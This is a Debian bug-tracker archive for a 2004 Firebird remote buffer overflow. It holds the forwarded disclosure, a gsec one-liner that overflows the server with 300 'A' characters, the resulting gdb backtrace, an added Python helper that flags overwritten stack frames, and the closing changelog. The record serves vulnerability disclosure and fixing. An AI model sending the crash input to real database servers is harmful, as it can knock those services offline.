[Pkg-firebird-general] Bug#251458: marked as done (firebird: remote vulnerability)

Debian Bug Tracking System owner@bugs.debian.org
Mon, 06 Sep 2004 08:48:09 -0700

Your message dated Mon, 06 Sep 2004 11:32:38 -0400
with message-id <E1C4LTy-0001Ww-00@newraff.debian.org>
and subject line Bug#251458: fixed in firebird 1.0.3-2
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

Date: Fri, 28 May 2004 17:47:10 +0200
From: Remco Seesink <raseesink@hotpop.com>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Cc: noamr@beyondsecurity.com
Subject: firebird: remote vulnerability
Message-Id: <20040528174710.4582a5b7.raseesink@hotpop.com>

Package: firebird
Severity: grave
Tags: security, help


While preparing an nmu for this package I became aware of a security problem
from the previous maintainer. (I am considering adopting.)

If somebody knows this is fixed in firebird 1.0.3 that would be useful
information to me.


The problem is described in this e-mail:
From: Noam Rathaus <noamr@beyondsecurity.com>
Organization: Beyond Security
To: security@debian.org, team@security.debian.org
Subject: Security Vulnerability in Firefox Database
Date: Mon, 17 May 2004 19:04:54 +0300
User-Agent: KMail/1.6.2
Cc: SecurITeam News <news@securiteam.com>



I know that version LI-V6.2.908 Firebird 1.0 (1.0.2-2.1) is very old, but
there appears to be a remotely exploitable overflow in this program.

By issuing:
gsec -database`perl -e'print ("A"x300)'`
-user whenever -password whatever

On a remote server, you can see that:
gdb /usr/lib/firebird/bin/ibserver
GNU gdb 6.1-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are
welcome to change it and/or distribute copies of it
under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show
warranty" for details.
This GDB was configured as "i386-linux"...(no debugging
symbols found)...Using host libthread_db library

(gdb) r
Starting program: /usr/lib/firebird/bin/ibserver
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[Thread
debugging using libthread_db enabled]
[New Thread 1075462272 (LWP 31389)]
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[New
Thread 1092549552 (LWP 31392)]
[New Thread 1100938160 (LWP 31393)]
[Thread 1100938160 (LWP 31393) exited]
[Thread 1092549552 (LWP 31392) exited]
[New Thread 1092549552 (LWP 31396)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1092549552 (LWP 31396)]
0x08132223 in ERR_post ()

(gdb) bt
#0  0x08132223 in ERR_post ()
#1  0x080942ac in THD_wlck_unlock ()
#2  0x41414141 in ?? ()
#3  0x41414141 in ?? ()
#4  0x41414141 in ?? ()
#5  0x41414141 in ?? ()
#6  0x41414141 in ?? ()
#7  0x41414141 in ?? ()
#8  0x00414141 in ?? ()
#9  0x0000012c in ?? ()

Debian is currently not maintaining this version of the product, but I thought
it was worth mentioning.

Noam Rathaus
Beyond Security Ltd.


-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (990, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.4.26-1-686
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8
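
Added example (not part of the original messages and not Firebird or Debian code): a small triage helper for the gdb backtrace quoted in the report above. It flags frames whose "return address" is just a repeated printable byte, which is how the 0x41414141 frames show that the saved stack contents were overwritten by the 300-byte "A" string. The function names are hypothetical; the frames are copied from the report.

```python
import re

# Frames copied from the gdb backtrace in the report above (i386, 32-bit).
SAMPLE_BT = """\
#0  0x08132223 in ERR_post ()
#1  0x080942ac in THD_wlck_unlock ()
#2  0x41414141 in ?? ()
#3  0x41414141 in ?? ()
#4  0x41414141 in ?? ()
#5  0x41414141 in ?? ()
#6  0x41414141 in ?? ()
#7  0x41414141 in ?? ()
#8  0x00414141 in ?? ()
#9  0x0000012c in ?? ()
"""

FRAME_RE = re.compile(r"^#(\d+)\s+0x([0-9a-fA-F]+)\s+in\s+(\S+)", re.M)

def parse_frames(bt_text):
    """Return (frame_no, address, symbol) for each frame line of `bt` output."""
    return [(int(n), int(a, 16), sym) for n, a, sym in FRAME_RE.findall(bt_text)]

def filler_byte(addr):
    """Return the repeated printable character if addr consists only of that
    byte (trailing NUL bytes allowed, e.g. a string terminator), else None."""
    width = max(4, (addr.bit_length() + 7) // 8)
    raw = addr.to_bytes(width, "little").rstrip(b"\x00")
    if len(raw) >= 2 and len(set(raw)) == 1 and 0x20 <= raw[0] < 0x7F:
        return chr(raw[0])
    return None

def triage(bt_text, input_len=None):
    """Summarise stack-overwrite evidence in a backtrace."""
    frames = parse_frames(bt_text)
    hits = [(n, filler_byte(a)) for n, a, _ in frames if filler_byte(a)]
    # Last frame with a resolved symbol before the filler starts: a starting
    # point for source review (without debug symbols the name may only be the
    # nearest exported symbol, not the function that actually overflowed).
    resolved = [s for n, _, s in frames if hits and n < hits[0][0] and s != "??"]
    return {
        "overwritten_frames": [n for n, _ in hits],
        "filler": sorted({c for _, c in hits}),
        "last_resolved_symbol": resolved[-1] if resolved else None,
        # Frames whose value equals the length of the supplied input string.
        "length_frames": [n for n, a, _ in frames if a == input_len],
    }

if __name__ == "__main__":
    print(triage(SAMPLE_BT, input_len=300))
```

Frame #8 (0x00414141) is the tail of the string including its terminating NUL, and frame #9 (0x0000012c) equals 300, the length of the filler string used in the report.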

From: Remco Seesink <raseesink@hotpop.com>
To: 251458-close@bugs.debian.org
X-Katie: $Revision: 1.51 $
Subject: Bug#251458: fixed in firebird 1.0.3-2
Message-Id: <E1C4LTy-0001Ww-00@newraff.debian.org>
Sender: Archive Administrator <katie@ftp-master.debian.org>
Date: Mon, 06 Sep 2004 11:32:38 -0400

Source: firebird
Source-Version: 1.0.3-2

We believe that the bug you reported is fixed in the latest version of
firebird, which is due to be installed in the Debian FTP archive:

  to pool/main/f/firebird/firebird-dev_1.0.3-2_i386.deb
  to pool/main/f/firebird/firebird_1.0.3-2.diff.gz
  to pool/main/f/firebird/firebird_1.0.3-2.dsc
  to pool/main/f/firebird/libfirebird-c32_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-c64_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-s32_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-s64_1.0.3-2_i386.deb

A summary of the changes between this version and the previous one is

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 251458@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
Remco Seesink <raseesink@hotpop.com> (supplier of updated firebird package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


Format: 1.7
Date: Thu,  2 Sep 2004 21:26:01 +0200
Source: firebird
Binary: libfirebird-s64 libfirebird-c64 libfirebird-s32 firebird-dev libfirebird-c32
Architecture: source i386
Version: 1.0.3-2
Distribution: unstable
Urgency: high
Maintainer: Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>
Changed-By: Remco Seesink <raseesink@hotpop.com>
 firebird-dev - Development files for FireBird - RDBMS based on InterBase 6.0 cod
 libfirebird-c32 - Library files for FireBird Classic w/ 32bit I/O, InterBase compat
 libfirebird-c64 - Library files for FireBird Classic w/ 64bit I/O, InterBase compat
 libfirebird-s32 - Library files for FireBird Super w/ 32bit I/O, InterBase compat
 libfirebird-s64 - Library files for FireBird Super w/ 64bit I/O, InterBase compat
Closes: 251458
 firebird (1.0.3-2) unstable; urgency=high
   * This package will provide only firebird libraries from now on, which are
     useful for backward compatibility.  Closes: #251458
   * Documenting the situation in README.Debian
   * This version is needed to solve #268931 for sarge.
